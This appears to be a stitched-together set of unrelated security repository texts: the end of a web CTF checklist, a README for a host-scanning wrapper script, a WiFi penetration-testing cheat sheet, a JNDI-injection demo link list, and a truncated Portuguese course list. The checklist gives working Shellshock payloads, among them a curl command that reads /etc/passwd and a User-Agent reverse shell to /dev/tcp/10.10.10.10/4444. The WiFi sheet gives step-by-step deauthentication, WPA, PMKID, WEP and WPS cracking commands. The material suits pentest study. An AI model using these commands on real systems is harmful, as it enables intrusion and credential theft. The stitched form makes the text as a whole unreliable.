vulnerable OpenSSL server's RAM: Username, Password, Cookie RAM is unpredictable, so you may need to run heartbleed.py multiple times. Must use Firefox / HTTPS to browse to site, perform 2 logins - first login will be in RAM. https://gist.github.com/eelsivart/10174134 Save a local copy of the RAM contents that are disclosed via heartbleed. By default, heartbleed.py will write dump.bin to the current directory. heartbleed.py -f /home/user/dump.bin heartbleed.site.org | less strings /home/student/dump.bin -> look for creds / cookie ## Shellshock Bug in Bash shell itself incorrectly executing trailing commands when it imports a function definition stored in an enviroment variable. Commonly found in CGI-based webservers, which use user input to define enviromental variables. Metasploit module or 34900.py ("Apache mod_cgi - 'Shellshock' Remote Command Injection") Syntax: () { :; } Manual test for CGI based webservers: curl -x http://192.168.90.61:3128 -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" -L http://10.10.10.10/cgi-bin/status curl -A "() { ignored;}; echo; /bin/cat /etc/passwd" http://127.0.0.1/cgi-bin/netstat.cgi Nmap script check: nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/user.sh 10.10.10.10 To exploit change vulnerable field in HTTP request (likely UAS) to a reverse shell command: User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4444 0>&1 # SSRF Server requests resource of behalf of the web client. SSRF example using curl: curl -v "https://site.org/get.php?logo=file://etc/hosts" #local file reference # Resources ## Cheat Sheets [SQLi cheat sheet](https://guif.re/sqli) [OWASP Cheat Sheet Series](https://cheatsheetseries.owasp.org/Glossary.html) https://websec.ca/kb/sql_injection https://pentestmonkey.net/category/cheat-sheet/sql-injection https://sqlwiki.netspi.com/ https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet/ ## Further Reading [OWASP Web App Testing Guide](https://owasp.org/www-project-web-security-testing-guide/stable/) [Bypassing File Upload Restrictions ](http://www.securityidiots.com/Web-Pentest/hacking-website-by-shell-uploading.html) [Web vulnerabilities to gain access to the system - paper](https://www.exploit-db.com/papers/13017/) File Inclusion [RFI to LFI](https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-1) Basic SQLi http://www.securityidiots.com/Web-Pentest/SQL-Injection/Part-1-Basic-of-SQL-for-SQLi.html http://www.securityidiots.com/Web-Pentest/SQL-Injection/Part-2-Basic-of-SQL-for-SQLi.html http://www.securityidiots.com/Web-Pentest/SQL-Injection/Part-3-Basic-of-SQL-for-SQLi.html http://www.sqlinjection.net/login/ ## Sources https://fareedfauzi.gitbook.io/ctf-checklist-for-beginner/web
# security-scripts A collection of security related Python and Bash shell scripts, mainly revolving around testing hosts for security vulnerabilities. For the shell scripts no fancy programming framework is required, all that is needed is a Bash shell. Note that it is highly recommended to use `analyze_hosts.py` as it is the most recent version. No new features will be added to the Bash version `analyze_hosts.sh`. `analyze_hosts` is also available as Docker image, including the open source scanners `droopescan`, `nmap`, `Nikto` and `testssl.sh`. Build it yourself using the supplied Dockerfile, or grab the image from Docker Hub ``` docker run --rm gofwd/analyze_hosts ``` You can also run the included tools that way; just override the entrypoint. As an example, run `testssl.sh`: ``` docker run --rm --entrypoint 'testssl.sh' gofwd/analyze_hosts ``` ## analyze_hosts.py A simple wrapper script around several open source security tools to simplify scanning of hosts for network vulnerabilities. The script lets you analyze one or several hosts for common misconfiguration vulnerabilities and weaknesses. The main objectives for the script is to make it as easy as possible to perform generic security tests, without any heavy prerequisites, make the output as informative as possible, and use open source tools. It can easily be used as scheduled task, or be implemented in Continuous Integration environments. The only requirements are `nmap` and `Python3`. As the scan output can be written to a JSON file it can be used to generate deltas (differences) between scans, or to use the output for further inspection. ### Installation Note that you can also run `analyze_hosts` straight from a Docker image: ``` docker run --rm gofwd/analyze_hosts ``` One-time installation steps without virtualenv (all required Python libraries are specified in the `requirements.txt` file): ``` git clone https://github.com/PeterMosmans/security-scripts && \ cd security-script && \ pip3 install -r requirements.txt ``` ### Usage ``` usage: analyze_hosts.py [-h] [--version] [--dry-run] [-i INPUTFILE] [-o OUTPUT_FILE] [--compact] [--queuefile QUEUEFILE] [--resume] [--settings SETTINGS] [--exit-code] [--force] [--debug] [-v] [-q] [--allports] [-n] [-p PORT] [--up] [--udp] [--framework] [--http] [--compression] [--headers] [--trace] [--redirect] [--force-ssl] [--json JSON] [--ssl] [--nikto] [--sslcert] [-w] [--proxy PROXY] [--timeout TIMEOUT] [--threads THREADS] [--user-agent USER_AGENT] [--password PASSWORD] [--username USERNAME] [--maxtime MAXTIME] [target] analyze_hosts - scans one or more hosts for security misconfigurations Copyright (C) 2015-2022 Peter Mosmans [Go Forward] This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. positional arguments: target [TARGET] can be a single (IP) address, an IP range, or multiple comma-separated addressess optional arguments: -h, --help show this help message and exit --version Show version and exit --dry-run Only show commands, don't actually do anything -i INPUTFILE, --inputfile INPUTFILE A file containing targets, one per line -o OUTPUT_FILE, --output-file OUTPUT_FILE output file containing all scanresults (default analyze_hosts.output) --compact Only log raw logfiles and alerts to file --queuefile QUEUEFILE the queuefile --resume Resume working on the queue --settings SETTINGS Name of settings file to use (default analyze_hosts.yml) --exit-code When supplied, return exit code 1 when alerts are discovered --force Ignore / overwrite the queuefile --debug Show debug information -v, --verbose Be more verbose -q, --quiet Do not show scan outputs on the console --allports Run a full-blown nmap scan on all ports -n, --no-portscan Do NOT run a nmap portscan -p PORT, --port PORT Specific port(s) to scan --up Assume host is up (do not rely on ping probe) --udp Check for open UDP ports as well --framework Analyze the website and run webscans --http Check for various HTTP vulnerabilities (compression, headers, trace) --compression Check for webserver compression --headers Check for various HTTP headers --trace Check webserver for HTTP TRACE method --redirect Check for insecure redirect --force-ssl Enforce SSL/TLS check on all open ports --json JSON Save output in JSON file --ssl Check for various SSL/TLS vulnerabilities --nikto Run a nikto scan --sslcert Download SSL certificate -w, --whois Perform a whois lookup --proxy PROXY Use proxy server (host:port) --timeout TIMEOUT Timeout for requests in seconds (default 10) --threads THREADS Maximum number of threads (default 5) --user-agent USER_AGENT Custom User-Agent to use (default analyze_hosts) --password PASSWORD Password for HTTP basic host authentication --username USERNAME Username for HTTP basic host authentication --maxtime MAXTIME Timeout for scans in seconds (default 600) ``` The script `analyze_hosts` automatically execute other scans (based on their fingerprint or open ports): ``` droopescan nikto testssl.sh WPscan ``` You can use the following environment variables (all uppercase) to specify the tools if they cannot be found in the standard paths: CURL, DROOPESCAN, NIKTO, OPENSSL, TESTSSL, WPSCAN ### Suppressing false positives A settings file can be used (`--settings`) to configure or tweak scan parameters per host / port combination. This allows you to suppress false positives in scan results. Currently the Nikto `Plugins`, `Tuning` and `output` parameters are supported, as well as a list of allowed / expected open ports, and testssl parameters: Example settings file: ``` targets: 127.0.0.1: allowed_ports: [22, 80, 443] ports: - port: 80 nikto_plugins: "@@ALL" nikto_tuning: "x1" nikto_output: "report.html" - port: 443 testssl_untrusted: true testssl: - "--ccs-injection" - "--ticketbleed" - "--robot" ``` This will supply the `-Plugins '@@ALL' -Tuning 'x1' -output 'report.html' parameters to Nikto, when port 80 is scanned. Furthermore, it will not generate an alert when an open port other than port 22, 80 or 443 is found. By default, an alert will be generated if an open port other than 80 or 443 is found. There will no alert be generated if the SSL/TLS endpoint on port 443 contains an untrusted (self-signed) certificate. And instead of all default tests, only three SSL/TLS tests will be performed. ### JSON format ``` { "arguments": { "target": "1.2.3.1/30", "version": false, "dry_run": false, "inputfile": "0frnfb4e", "output_file": "output.txt, "compact": true, "queuefile": "analyze_hosts.queue", "resume": false, "force": false, "debug": false, "verbose": false, "quiet": false, "allports": false, "no_portscan": false, "port": null, "up": false, "udp": false, "framework": false, "http": true, "json": "results.json", "ssl": true, "nikto": true, "sslcert": false, "trace": false, "whois": false, "proxy": null, "timeout": true, "threads": 5, "user_agent": "analyze_hosts", "password": null, "username": null, "maxtime": 1200, "testssl.sh": true, "curl": false, "wpscan": true, "droopescan": true, "nmap": true, "nmap_arguments": "-sV --open -sS --script=banner,dns-nsid,dns-recursion,http-cisco-anyconnect,http-php-version,http-title,http-trace,ntp-info,ntp-monlist,nbstat,rdp-enum-encryption,rpcinfo,sip-methods,smb-os-discovery,smb-security-mode,smtp-open-relay,ssh2-enum-algos,vnc-info,xmlrpc-methods,xmpp-info" }, "date_start": "2020-05-26 31:33:06" "results": { "1.2.3.1": { "ports": [ 53 ] }, "1.2.3.2": { "ports": [] }, "1.2.3.3": { "ports": [ 80, 443 ], "alerts": [ ":443 LUCKY13 (CVE-2013-0169), experimental potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS. Check patches" ] }, "1.2.3.4": { "ports": [ 80, 443 ], "alerts": [ ":443 + OSVDB-3092: /download/: This might be interesting...", ":443 + OSVDB-3092: /status/: This might be interesting...", ":443 + OSVDB-4231: /DHrPp.xml: Coccoon from Apache-XML project reveals file system path in error messages.", ":443 + OSVDB-3092: /upgrade.php: upgrade.php was found." ] } }, "date_finish": "2020-05-26 31:33:07" } ``` ## display_results.py A little helper script that formats the scan results nicely, so that scan results can easily be reviewed. ``` usage: display_results.py [-h] [--info] [--version] [inputfile] display_results version 0.0.1 - displays scan results nicely positional arguments: inputfile A JSON file containing scan results optional arguments: -h, --help show this help message and exit --info Show also informational items --version Show version and exit ``` ## analyze-hosts.sh A simple wrapper script around several open source security tools to simplify scanning of hosts for network vulnerabilities. The script lets you analyze one or several hosts for common misconfiguration vulnerabilities and weaknesses. The main objectives for the script is to make it as easy as possible to perform generic security tests, without any heavy prerequisites, make the output as informative as possible, and use open source tools.... - [cipherscan](https://github.com/jvehent/cipherscan) - curl - nmap - [openssl-1.0.2-chacha](https://github.com/PeterMosmans/openssl/tree/1.0.2-chacha/) - [whatweb](https://github.com/urbanadventurer/WhatWeb) * whois ### Examples #### SSL certificates ``` ./analyze_hosts.sh --sslcert www.google.com ``` Shows details of a certificate, like the issuer and subject. It warns when certificate is expired or when the certificate is a certificate authority. Example output: ``` trying to retrieve SSL x.509 certificate on www.google.com:443... received issuer= countryName = US organizationName = Google Inc commonName = Google Internet Authority G2 subject= countryName = US stateOrProvinceName = California localityName = Mountain View organizationName = Google Inc commonName = www.google.com OK: certificate is valid between 16-07-2014 and 14-10-2014 ``` #### SSL/TLS ciphers ``` ./analyze_hosts.sh --ssl --sslports 443 -v www.microsoft.com ``` Checks which ciphers are allowed. It warns when insecure ciphers are being used. By default the ports 443, 465, 993, 995 and 3389 and are checked. You can specify the ports by using --sslports The -v flag outputs all results, regardles of the message type. Example output: ``` prio ciphersuite protocols pfs_keysize 1 RC4-MD5 SSLv3,TLSv1 2 RC4-SHA SSLv3,TLSv1 3 DES-CBC3-SHA SSLv3,TLSv1 4 AES256-SHA TLSv1 5 AES128-SHA TLSv1 Certificate: UNTRUSTED, 2048 bit, sha1WithRSAEncryption signature trying to retrieve SSL x.509 certificate on www.microsoft.com:443... received issuer= domainComponent = com domainComponent = microsoft domainComponent = corp domainComponent = redmond commonName = MSIT Machine Auth CA 2 subject= countryName = US stateOrProvinceName = WA localityName = Redmond organizationName = Microsoft Corporation organizationalUnitName = MSCOM commonName = www.microsoft.com OK: certificate is valid between 12-01-2013 and 12-01-2015 performing nmap sslscan on www.microsoft.com ports 443... Nmap scan report for www.microsoft.com (134.170.184.133) Host is up (0.15s latency). PORT STATE SERVICE 443/tcp open https | ssl-enum-ciphers: | SSLv3: | ciphers: | TLS_RSA_WITH_3DES_EDE_CBC_SHA - strong | TLS_RSA_WITH_RC4_128_MD5 - strong | TLS_RSA_WITH_RC4_128_SHA - strong | compressors: | NULL | TLSv1.0: | ciphers: | TLS_RSA_WITH_3DES_EDE_CBC_SHA - strong | TLS_RSA_WITH_AES_128_CBC_SHA - strong | TLS_RSA_WITH_AES_256_CBC_SHA - strong | TLS_RSA_WITH_RC4_128_MD5 - strong | TLS_RSA_WITH_RC4_128_SHA - strong | compressors: | NULL |_ least strength: strong ``` ### usage ``` ./analyze_hosts.sh [OPTION]... [HOST] Scanning options: -a, --all perform all basic scans --max perform all advanced scans (more thorough) -b, --basic perform basic scans (fingerprint, ssl, trace) results of HOST matches regexp FILTER --dns test for recursive query and version string -f perform web fingerprinting (all webports) --fingerprint perform all web fingerprinting methods -h, --header show webserver headers (all webports) -n, --nikto nikto webscan (all webports) -p nmap portscan (top 1000 TCP ports) --ports nmap portscan (all ports, TCP and UDP) --redirect test for open secure redirect -s check SSL configuration --ssl perform all SSL configuration checks --sslcert show details of SSL certificate --timeout=SECONDS change timeout for tools (default 60) --ssh perform SSH configuration checks -t check webserver for HTTP TRACE method --trace perform all HTTP TRACE method checks -w, --whois perform WHOIS lookup for (hostname and) IP address -W confirm WHOIS results before continuing scan --filter=FILTER only proceed with scan of HOST if WHOIS --wordlist=filename scan webserver for existence of files in filename Port selection (comma separated list): --webports=PORTS use PORTS for web scans (default 80,443,8080) --sslports=PORTS use PORTS for ssl scans (default 443,465,993,995,3389) Logging and input file: -d, --directory=DIR location of temporary files (default /tmp) -i, --inputfile=FILE use a file containing hostnames -l, --log log each scan in a separate logfile --nocolor don't use fancy colors in screen output -o, --output=FILE concatenate all OK and WARNING messages into FILE -q, --quiet quiet -v, --verbose show server responses Default programs: --cipherscan=FILE location of cipherscan (default cipherscan) --openssl=FILE location of openssl (default openssl) -u update this script (if it's a cloned repository) --update force update (overwrite all local modifications) --version print version information and exit BLUE: INFO, status messages GREEN: OK, secure settings RED: WARNING, possible vulnerabilities [HOST] can be a single (IP) address, an IP range, eg. 127.0.0.1-255 or multiple comma-separated addressess ``` ### history - since 0.88: preliminary support for starttls xmpp ## test_ssl_handhake.sh A script to test TLS/SSL handshakes with. Several bugtests are included: - 128 cipherlimit when using tls1_2 protocol - aRSA cipher order - version intolerant server \$ ./test_ssl_handshake.sh ``` (c) 2014 Peter Mosmans [Go Forward] Licensed under the GPL 3.0 tests SSL/TLS handshakes (for known bugs) usage: ./test_ssl_handshake.sh target[:port] [start] [start] number of ciphers to start with (default 125) --ciphers=FILE a file containing a list which ciphers to use --cipherstring=CIPHERSTRING cipherstring (default ) -f | --force continue even though the error has been detected --iterate iterate through all the ciphers instead of adding --openssl=FILE location of openssl (default ) -v | --verbose be more verbose, please tests: --128 test for 128 cipherlimit --intolerant test for version intolerant server --rsa test for RSA order sensitivity by default, all tests will be performed ```
# WiFi Penetration Testing Cheat Sheet This is more of a checklist for myself. May contain useful tips and tricks. Everything was tested on Kali Linux v2021.4 (64-bit) and WiFi Pineapple Mark VII Basic with the firmware v1.0.2. Everything was tested on Kali Linux v2021.4 (64-bit) and WiFi Pineapple NANO with the firmware v2.7.0. For help with any of the tools type `<tool_name> [-h | -hh | --help]` or `man <tool_name>`. Sometimes `-h` can be mistaken for a host or some other option. If that's the case, use `-hh` or `--help` instead, or read the manual with `man`. Websites that you should use while writing the report: * [cwe.mitre.org/data](https://cwe.mitre.org/data) * [owasp.org/projects](https://owasp.org/projects) * [cheatsheetseries.owasp.org](https://cheatsheetseries.owasp.org/Glossary.html) * [nvd.nist.gov/vuln-metrics/cvss/v3-calculator](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator) * [nvd.nist.gov/ncp/repository](https://nvd.nist.gov/ncp/repository) * [attack.mitre.org](https://attack.mitre.org) Check the most popular tool for auditing wireless networks [v1s1t0r1sh3r3/airgeddon](https://github.com/v1s1t0r1sh3r3/airgeddon). Credits to the author! Future plans: * fake AP with RADIUS to crack the WPA2 Enterprise authentication. My other cheat sheets: * [Penetration Testing Cheat Sheet](https://github.com/ivan-sincek/penetration-testing-cheat-sheet) * [iOS Penetration Testing Cheat Sheet](https://github.com/ivan-sincek/ios-penetration-testing-cheat-sheet) * [Android Testing Cheat Sheet](https://github.com/ivan-sincek/android-penetration-testing-cheat-sheet) ## Table of Contents **1. [Configuration](#1-configuration)** **2. [Monitoring](#2-monitoring)** **3. [Cracking](#3-cracking)** * [WPA/WPA2 Handshake](#wpawpa2-handshake) (WPA/WPA2) * [PMKID Attack](#pmkid-attack) (WPA/WPA2) * [ARP Request Replay Attack](#arp-request-replay-attack) (WEP) * [Hitre Attack](#hitre-attack) (WEP) * [WPS PIN](#wps-pin) **4. [Wordlists](#4-wordlists)** **5. [Post-Exploitation](#5-post-exploitation)** **6. [Evil-Twin](#6-evil-twin)** ## 1. Configuration View the configuration of network interfaces: ```bash ifconfig && iwconfig && airmon-ng ``` Turn a network interface on/off: ```fundamental ifconfig wlan0 up ifconfig wlan0 down ``` Restart the network manager: ```fundamental service NetworkManager restart ``` Check the WLAN regulatory domain: ```fundamental iw reg get ``` Set the WLAN regulatory domain: ```fundamental iw reg set HR ``` Turn the power of a wireless interface up/down (too high can be illegal in some countries): ```fundamental iwconfig wlan0 txpower 40 ``` ## 2. Monitoring Set a wireless network interface to the monitoring mode: ```bash airmon-ng start wlan0 ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up ``` Set a wireless network interface to the monitoring mode on a specified channel: ```fundamental airmon-ng start wlan0 8 iwconfig wlan0 channel 8 ``` \[Optional\] Kill services that might interfere with wireless network interfaces in the monitoring mode: ```fundamental airmon-ng check kill ``` Set a wireless network interface back to the managed mode: ```bash airmon-ng stop wlan0mon ifconfig wlan0 down && iwconfig wlan0 mode managed && ifconfig wlan0 up ``` Search for WiFi networks within your range: ```fundamental airodump-ng --wps -w airodump_sweep_results wlan0mon wash -a -i wlan0mon ``` \[Optional\] Install `reaver/wash` on WiFi Pineapple Mark VII: ```bash opkg update && opkg install libpcap reaver ``` \[Optional\] Install `reaver/wash` on WiFi Pineapple Nano: ```bash opkg update && opkg install libpcap && opkg -d sd install wash ``` Monitor a WiFi network to capture handshakes/requests: ```fundamental airodump-ng wlan0mon --channel 8 -w airodump_essid_results --essid essid --bssid FF:FF:FF:FF:FF:FF ``` If you specified the output file, don't forget to stop `airodump-ng` after you are done monitoring because it will fill up all your free storage space with a large PCAP file. Use [Kismet](https://github.com/ivan-sincek/evil-twin#additional-kismet) or WiFi Pineapple to find more information about wireless access points, e.g. their MAC address, vendor's name, etc. ## 3. Cracking Check if a wireless interface supports packet injection: ```fundamental aireplay-ng --test wlan1 -e essid -a FF:FF:FF:FF:FF:FF ``` ### WPA/WPA2 Handshake Monitor a WiFi network to capture a WPA/WPA2 4-way handshake: ```fundamental airodump-ng wlan0mon --channel 8 -w airodump_essid_results --essid essid --bssid FF:FF:FF:FF:FF:FF ``` \[Optional\] Deauthenticate clients from a WiFi network: ```fundamental aireplay-ng --deauth 10 wlan1 -e essid -a FF:FF:FF:FF:FF:FF ``` Start the dictionary attack against a WPA/WPA2 handshake: ```fundamental aircrack-ng -e essid -b FF:FF:FF:FF:FF:FF -w rockyou.txt airodump_essid_results*.cap ``` ### PMKID Attack Crack the WPA/WPA2 authentication without deauthenticating clients. Install required tools on Kali Linux: ```bash apt-get update && apt-get -y install hcxtools ``` \[Optional\] Install required tool on WiFi Pineapple Mark VII: ```bash opkg update && opkg install hcxdumptool ``` \[Optional\] Install required tool on WiFi Pineapple Nano: ```bash opkg update && opkg -d sd install hcxdumptool ``` Start capturing PMKID hashes for all nearby networks: ```fundamental hcxdumptool --enable_status=1 -o hcxdumptool_results.cap -i wlan0mon ``` \[Optional\] Start capturing PMKID hashes for specified WiFi networks: ```bash echo HH:HH:HH:HH:HH:HH | sed 's/\://g' >> filter.txt hcxdumptool --enable_status=1 -o hcxdumptool_results.cap -i wlan0mon --filterlist_ap=filter.txt --filtermode=2 ``` Sometimes it can take hours to capture a single PMKID hash. Extract PMKID hashes from a PCAP file: ```fundamental hcxpcaptool hcxdumptool_results.cap -k hashes.txt ``` Start the dictionary attack against PMKID hashes: ```fundamental hashcat -m 16800 -a 0 --session=cracking --force --status -O -o hashcat_results.txt hashes.txt rockyou.txt ``` Find out more about Hashcat from my other [project](https://github.com/ivan-sincek/penetration-testing-cheat-sheet#hashcat). ### ARP Request Replay Attack If target WiFi network is not busy, it can take days to capture enough IVs to crack the WEP authentication. Do the fake authentication to a WiFi network with non-existing MAC address and keep the connection alive: ```fundamental aireplay-ng --fakeauth 6000 -o 1 -q 10 wlan1 -e essid -a FF:FF:FF:FF:FF:FF -h FF:FF:FF:FF:FF:FF ``` If MAC address filtering is active, do the fake authentication to a WiFi network with an existing MAC address: ```fundamental aireplay-ng --fakeauth 0 wlan1 -e essid -a FF:FF:FF:FF:FF:FF -h FF:FF:FF:FF:FF:FF ``` To monitor the number of captured IVs, run `airodump-ng` against a WiFi network and watch the `#Data` column (try to capture around 100k IVs): ```fundamental airodump-ng wlan0mon --channel 8 -w airodump_essid_results --essid essid --bssid FF:FF:FF:FF:FF:FF ``` Start the standard ARP request replaying against a WiFi network: ```fundamental aireplay-ng --arpreplay wlan1 -e essid -a FF:FF:FF:FF:FF:FF -h FF:FF:FF:FF:FF:FF ``` \[Optional\] Deauthenticate clients from a WiFi network: ```fundamental aireplay-ng --deauth 10 wlan1 -e essid -a FF:FF:FF:FF:FF:FF ``` Crack the WEP authentication: ```fundamental aircrack-ng -e essid -b FF:FF:FF:FF:FF:FF replay_arp*.cap ``` ### Hitre Attack This attack targets clients, not wireless access points. You must know the SSIDs of your target's WiFi networks. \[Optional\] Set up a fake WEP WiFi network if the real one is not present: ```fundamental airbase-ng -W 1 -N wlan0mon -c 8 --essid essid -a FF:FF:FF:FF:FF:FF ``` If needed, turn up the power of a wireless network interface to missassociate clients to the fake WiFi network, see how in section [1. Configuration](#1-configuration). Monitor the real/fake WiFi network to capture handshakes/requests: ```fundamental airodump-ng wlan0mon --channel 8 -w airodump_essid_results --essid essid --bssid FF:FF:FF:FF:FF:FF ``` Start replaying packets to clients within your range: ```fundamental aireplay-ng --cfrag -D wlan1 -e essid -h FF:FF:FF:FF:FF:FF ``` \[Optional\] Deauthenticate clients from the real/fake WiFi network: ```fundamental aireplay-ng --deauth 10 wlan1 -e essid -a FF:FF:FF:FF:FF:FF ``` Crack the WEP authentication: ```fundamental aircrack-ng -e essid -b FF:FF:FF:FF:FF:FF airodump_essid_results*.cap ``` ### WPS PIN Crack a WPS PIN: ```fundamental reaver -vv --pixie-dust -i wlan1 -c 8 -e essid -b FF:FF:FF:FF:FF:FF ``` Crack a WPS PIN with some delay between attempts: ```fundamental reaver -vv --pixie-dust -N -L -d 5 -r 3:15 -T 0.5 -i wlan1 -c 8 -e essid -b FF:FF:FF:FF:FF:FF ``` ## 4. Wordlists You can find `rockyou.txt` inside `/usr/share/wordlists/` directory or inside [SecLists](https://github.com/danielmiessler/SecLists) - a useful collection of multiple types of wordlists for security assessments. Install SecLists (the collection will be stored at `/usr/share/seclists/` directory): ```bash apt-get update && apt-get install seclists ``` Another popular wordlist collections: * [xmendez/wfuzz](https://github.com/xmendez/wfuzz) * [assetnote/commonspeak2-wordlists](https://github.com/assetnote/commonspeak2-wordlists) * [weakpass.com/wordlist](https://weakpass.com/wordlist) * [packetstormsecurity.com/Crackers/wordlists](https://packetstormsecurity.com/Crackers/wordlists) ### Password Spraying Find out how to generate a good password spraying wordlist from my other [project](https://github.com/ivan-sincek/wordlist-extender), but first you will need a few good keywords that describe your target. Such keywords can be a company name, abbreviations, words that describe your target's services, products, etc. After you generate the wordlist, use it with `aircrack-ng` to crack a WPA/WPA2 handshake. If strong password policy is enforced, passwords usually start with one capitalized word followed by a few digits and one special character at the end (e.g. Password123!). You can also use the generated wordlist with [Hashcat](https://github.com/ivan-sincek/penetration-testing-cheat-sheet#hashcat), e.g. to crack NTLMv2 hashes that you have collected using LLMNR responder, etc. ## 5. Post-Exploitation If MAC address filtering is active, change the MAC address of a wireless interface to an existing one: ```fundamental ifconfig wlan0 down && macchanger --mac FF:FF:FF:FF:FF:FF && ifconfig wlan0 up ``` Once you get an access to a WiFi network, run the following tools: ```fundamental yersinia -G responder -wF -i 192.168.8.5 wireshark ``` Find out how to pipe `tcpdump` from WiFi Pineapple to Wireshark from my other [poject](https://github.com/ivan-sincek/evil-twin#additional-sniff-wifi-network-traffic). Try to access the wireless access point's web interface. Search the Internet for default paths and credentials. Start scanning/enumerating the network. ## 6. Evil-Twin Find out how to set up a fake authentication web page on a fake WiFi network with WiFi Pineapple Mark VII Basic from my other [project](https://github.com/ivan-sincek/evil-twin), as well as how to set up all the tools from this cheat sheet.
This repo is for the demos of JNDI injection series: https://medium.com/bugbountywriteup/jndi-injection-series-rmi-vector-1-31044f782daa https://medium.com/bugbountywriteup/jndi-injection-series-rmi-vector-dynamic-class-loading-from-remote-url-28dcbf9cee27 https://medium.com/bugbountywriteup/jndi-injection-series-rmi-vector-insecure-deserialization-9b7a4b524d1d https://medium.com/@yany.dong/jndi-injection-series-rmi-vector-the-final-piece-of-the-puzzle-b6a65c4ab330
<p align="right">IT'S CURRENTLY A WIP - WORK IN PROGRESS</p> # "Zero to Hero" "No Bull$h1t" em Seguranรงa Cibernรฉtica Cursos para fazer um "Zero to Hero" em Cyber Seguranรงa **sem marketing**, vai ter que: - estudar muito (estamos falando de um "Hero" nรฉ?) - estudar coisas "nรฃo tรฉcnicas" e "nรฃo convencionais" (Qualidade = Hard Skills + Soft Skills) - estudar mais de uma vez a mesma coisa (Saber = Repetir + Repetir + Repetir) Ponto bom: - รšnico investimento รฉ o seu tempo, รฉ tudo "na faixa", "de grรกtis", "sem custo de grana". Disclaimer: - **Ninguรฉm precisa ser "Hero"**, mas lembre-se sempre da velha passagem (com traduรงรฃo em seguida para a galera que ainda nรฃo comeรงou o curso de inglรชs) _"Be careful whose advice you buy, but be patient with those who supply it. Advice is a form of nostalgia. Dispensing it is a way of fishing the past from the disposal, wiping it off, painting over the ugly parts and recycling it for more than it's worth."_ _"Tenha cuidado com as pessoas que lhe dรฃo conselhos, mas seja paciente com elas. Conselho รฉ uma forma de nostalgia. Dar conselhos รฉ uma forma de resgatar o passado da lata de lixo, limpa-lo, esconder as partes feias e reciclรก-lo por um preรงo maior do que realmente vale."_ <p align="right">Sunscreen (Everybody's Free) - Baz Luhrmann</p> Sem mais delongas, te desejo bons estudos! ## Bรกsico - 14 materiais - Inglรชs - [ ] Kultivi - Curso de inglรชs: https://kultivi.com/cursos/idiomas/ingles - Portuguรชs - [ ] EV - Comunicaรงรฃo Escrita: https://www.ev.org.br/cursos/comunicacao-escrita - Base de Computaรงรฃo - [ ] Netacad - Get Connected: https://www.netacad.com/courses/os-it/get-connected - [ ] FIAP - Gestรฃo de Infraestrutura de TI: https://on.fiap.com.br/local/movimentobrasildigital/ - Seguranรงa da informaรงรฃo geral - [ ] FGV Nic.Br - Seguranรงa Digital: https://educacao-executiva.fgv.br/cursos/online/curta-media-duracao-online/seguranca-digital - [ ] FGV Nic.Br - Termos de Uso e Polรญticas de Privacidade: https://educacao-executiva.fgv.br/cursos/online/curta-media-duracao-online/termos-de-uso-e-politicas-de-privacidade - [ ] Netacad - Introduction to Cybersecurity: https://www.netacad.com/courses/cybersecurity/introduction-cybersecurity - Sistemas Operacionais Windows - [ ] MSLearn - Path Microsoft 365 (9 Mรณdulos): https://docs.microsoft.com/en-us/learn/paths/m365-getmodern/ - Sistemas Operacionais Linux - [ ] Netacad - Linux Unhatched: https://www.netacad.com/courses/os-it/ndg-linux-unhatched - Desenvolvimento de software - [ ] Laracasts - PHP for Beginners: https://laracasts.com/series/php-for-beginners - Bancos de dados - [ ] Coursera Michigan - Introduction to SQL: https://www.coursera.org/learn/intro-sql - [ ] Mosh - MySQL in 3 Hours: https://www.youtube.com/watch?v=7S_tz1z_5bA - Soft Skills - [ ] Coursera DTS - Learning How to Learn: https://www.coursera.org/learn/learning-how-to-learn - [ ] FM2S - Criatividade: Princรญpios e Tรฉcnicas: https://ead.fm2s.com.br/curso/curso-de-criatividade-principios-e-abordagens/ ## Iniciante - 17 materiais - Portuguรชs - [ ] EV - Oficina de Gramรกtica: https://www.ev.org.br/cursos/oficina-de-lingua-portuguesa-gramatica - Base de computaรงรฃo - [ ] edX Harvard - cs50x: https://www.edx.org/course/introduction-computer-science-harvardx-cs50x - Base de Redes - [ ] Netacad - CCNAv7 Introduรงรฃo ร s Redes (pelo Nic.Br): https://cursoseventos.nic.br/curso/curso-ccna-intro-cisco-nicbr/ - Seguranรงa da informaรงรฃo geral - [ ] Netacad - Cybersecurity Essentials: https://www.netacad.com/courses/cybersecurity/cybersecurity-essentials - [ ] SANS - CyberAces: https://www.sans.org/cyberaces/ - [ ] NIC.br - Tratamento de Incidentes de Seguranรงa na Internet, explicado pelo NIC.br: https://youtu.be/flu6JPRHW04 - Sistemas Operacionais Windows - [ ] MSLearn - Windows Deployment (5 Mรณdulos): https://docs.microsoft.com/en-us/learn/paths/plan-your-windows-10-deployment-strategy/ - [ ] MSLearn - Windows Server (5 Mรณdulos): https://docs.microsoft.com/en-us/learn/paths/windows-server-deployment-configuration-administration/ - Sistemas Operacionais Linux - [ ] Linux Foundation - Introduction to Linux: https://training.linuxfoundation.org/training/introduction-to-linux/ - Sistemas de Firewall - [ ] Jose Bravo - PFSense (43 Vรญdeos): https://www.youtube.com/watch?v=aRVJmlqXAdQ&list=PLHh9jhztlMypPs0EIcpHE5R-5sc27r4Bc - Desenvolvimento de software - [ ] Netacad - Python: https://www.netacad.com/courses/programming/pcap-programming-essentials-python - [ ] Mosh - What is a REST API: https://www.youtube.com/watch?v=SLwpqD8n3d0 - Bancos de dados - [ ] Coursera Michigan - Database Design PostgreSQL: https://www.coursera.org/learn/database-design-postgresql - Ciรชncia de dados - [ ] Data Science Academy - Big Data Fundamentos 3.0: https://www.datascienceacademy.com.br/cursosgratuitos - [ ] Data Science Academy - Inteligรชncia Artificial Fundamentos 2.0: https://www.datascienceacademy.com.br/cursosgratuitos - [ ] Data Science Academy - Introduรงรฃo ร  Ciรชncia de Dados 3.0: https://www.datascienceacademy.com.br/cursosgratuitos - Soft Skills - [ ] EV - Organizacao 